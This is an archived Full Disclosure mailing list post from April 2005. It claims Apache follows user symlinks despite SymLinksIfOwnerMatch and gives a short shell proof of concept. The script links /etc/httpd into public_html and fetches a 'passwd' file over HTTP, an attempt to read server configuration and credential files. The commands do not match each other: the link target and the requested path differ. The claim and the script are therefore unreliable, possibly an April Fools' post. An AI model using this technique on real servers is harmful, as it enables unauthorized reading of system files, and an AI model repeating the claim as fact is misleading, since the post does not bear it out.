Full Disclosure mailing list archives
Phun With Apache
From: duper () willhackforfood biz
Date: Fri, 1 Apr 2005 04:19:55 -0500 (EST)
#!/bin/sh ## Apache follows symbolic links referenced by public_html! ## Even when SymLinksifOwnerMatch is set and FollowSymLinks is not! ## A super-easy way to gain read access on files owned by the apache user! ln -s /etc/httpd ~/public_html lynx http://localhost/~duper/passwd _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Phun With Apache duper (Apr 01)
- Re: Phun With Apache Graham Reed (Apr 11)